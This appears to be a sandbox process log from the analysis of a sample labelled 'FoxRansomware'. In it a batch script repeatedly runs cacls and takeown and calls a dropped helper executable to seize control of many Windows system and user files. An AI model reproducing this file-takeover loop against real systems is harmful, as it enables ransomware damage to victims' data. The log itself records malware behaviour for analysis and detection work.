C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.f1d9b747-3232-410f-9fe7-382f57674b45.1.etl""2⤵PID:1524
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\WuProvider.f1d9b747-3232-410f-9fe7-382f57674b45.1.etl" /E /G Admin:F /C3⤵PID:7192
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.f1d9b747-3232-410f-9fe7-382f57674b45.1.etl"3⤵PID:7796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "WuProvider.f1d9b747-3232-410f-9fe7-382f57674b45.1.etl" -nobanner3⤵PID:7752
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "WuProvider.f1d9b747-3232-410f-9fe7-382f57674b45.1.etl" -nobanner4⤵PID:7748
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm""2⤵PID:6644
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm" /E /G Admin:F /C3⤵PID:6288
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm"3⤵
- Modifies file permissions
PID:7984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "ActivitiesCache.db-shm" -nobanner3⤵PID:7052
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "ActivitiesCache.db-shm" -nobanner4⤵PID:5576
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4480
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2""2⤵PID:300
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2" /E /G Admin:F /C3⤵PID:1920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2"3⤵PID:8188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "settings.dat.LOG2" -nobanner3⤵PID:3388
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "settings.dat.LOG2" -nobanner4⤵PID:3708
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8132
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""2⤵PID:8008
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C3⤵PID:6500
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"3⤵
- Modifies file permissions
PID:5476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "TileCache_100_0_Header.bin" -nobanner3⤵PID:5848
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "TileCache_100_0_Header.bin" -nobanner4⤵PID:5864
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5280
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""2⤵PID:7040
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C3⤵PID:6496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"3⤵PID:7080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "behavior.xml" -nobanner3⤵PID:6684
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "behavior.xml" -nobanner4⤵PID:6428
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4060
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""2⤵PID:6544
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:6988
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"3⤵
- Modifies file permissions
PID:6752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:4288
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵PID:7012
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""2⤵PID:3536
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6636
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:6924
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"3⤵
- Modifies file permissions
PID:7044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:6616
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵PID:5788
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5652
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""2⤵PID:4128
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C3⤵PID:5628
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat"3⤵
- Modifies file permissions
PID:6488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "StorageHealthModel.dat" -nobanner3⤵PID:7096
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "StorageHealthModel.dat" -nobanner4⤵PID:4164
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5172
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml""2⤵PID:5516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml" /E /G Admin:F /C3⤵PID:6780
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml"3⤵PID:6212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner3⤵PID:2680
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner4⤵PID:4760
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml""2⤵PID:2932
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml" /E /G Admin:F /C3⤵PID:7128
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml"3⤵PID:1128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner3⤵PID:7124
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner4⤵PID:5564
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml""2⤵PID:3284
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml" /E /G Admin:F /C3⤵PID:5496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml"3⤵PID:4532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "ThemeSettings2013.xml" -nobanner3⤵PID:5372
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "ThemeSettings2013.xml" -nobanner4⤵PID:2544
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4292
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.1.etl""2⤵PID:1356
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.1.etl" /E /G Admin:F /C3⤵PID:5168
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.1.etl"3⤵PID:940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.1.etl" -nobanner3⤵PID:5300
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.1.etl" -nobanner4⤵PID:2920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4388
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.f1d9b747-3232-410f-9fe7-382f57674b45.1.etl""2⤵PID:6768
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.f1d9b747-3232-410f-9fe7-382f57674b45.1.etl" /E /G Admin:F /C3⤵PID:6108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.f1d9b747-3232-410f-9fe7-382f57674b45.1.etl"3⤵PID:5528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "WuProvider.f1d9b747-3232-410f-9fe7-382f57674b45.1.etl" -nobanner3⤵PID:5920
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "WuProvider.f1d9b747-3232-410f-9fe7-382f57674b45.1.etl" -nobanner4⤵PID:5612
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2724
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:1056
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:6460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵PID:7220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "overlay.png" -nobanner3⤵PID:5148
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "overlay.png" -nobanner4⤵PID:5452
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4088
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""2⤵PID:1416
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:6592
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"3⤵
- Modifies file permissions
PID:5272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:7588
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵PID:5296
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6792
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml""2⤵PID:2808
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml" /E /G Admin:F /C3⤵PID:5844
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml"3⤵PID:7004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner3⤵PID:4992
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner4⤵PID:6004
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4796
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml""2⤵PID:2744
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml" /E /G Admin:F /C3⤵PID:3316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml"3⤵
- Modifies file permissions
PID:5948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner3⤵PID:1400
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner4⤵PID:1696
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3908
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml""2⤵PID:5276
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml" /E /G Admin:F /C3⤵PID:6620
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml"3⤵PID:4324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner3⤵PID:5396
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner4⤵PID:884
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""2⤵PID:5440
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C3⤵PID:6928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"3⤵
- Modifies file permissions
PID:7812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner3⤵PID:6348
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner4⤵PID:5132
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.a5aee501-45ef-4436-bd89-eeca014254ea.1.etl""2⤵PID:6272
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.a5aee501-45ef-4436-bd89-eeca014254ea.1.etl" /E /G Admin:F /C3⤵PID:3664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.a5aee501-45ef-4436-bd89-eeca014254ea.1.etl"3⤵PID:1928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MoUsoCoreWorker.a5aee501-45ef-4436-bd89-eeca014254ea.1.etl" -nobanner3⤵PID:8024
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MoUsoCoreWorker.a5aee501-45ef-4436-bd89-eeca014254ea.1.etl" -nobanner4⤵PID:2968
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6264
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""2⤵PID:4476
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C3⤵PID:5432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"3⤵
- Modifies file permissions
PID:8116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "KnownGameList.bin" -nobanner3⤵PID:3204
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "KnownGameList.bin" -nobanner4⤵PID:3156
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1584
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin""2⤵PID:7424
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin" /E /G Admin:F /C3⤵PID:7248
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin"3⤵PID:6148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000D.bin" -nobanner3⤵PID:6252
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000000D.bin" -nobanner4⤵PID:2888
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin""2⤵PID:7664
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin" /E /G Admin:F /C3⤵PID:7484
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin"3⤵
- Modifies file permissions
PID:7344
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000P.bin" -nobanner3⤵PID:7552
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000000P.bin" -nobanner4⤵PID:6280
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7524
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin""2⤵PID:7684
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin" /E /G Admin:F /C3⤵PID:272
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin"3⤵PID:7964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000013.bin" -nobanner3⤵PID:7864
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000013.bin" -nobanner4⤵PID:7632
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8044
-
-
-
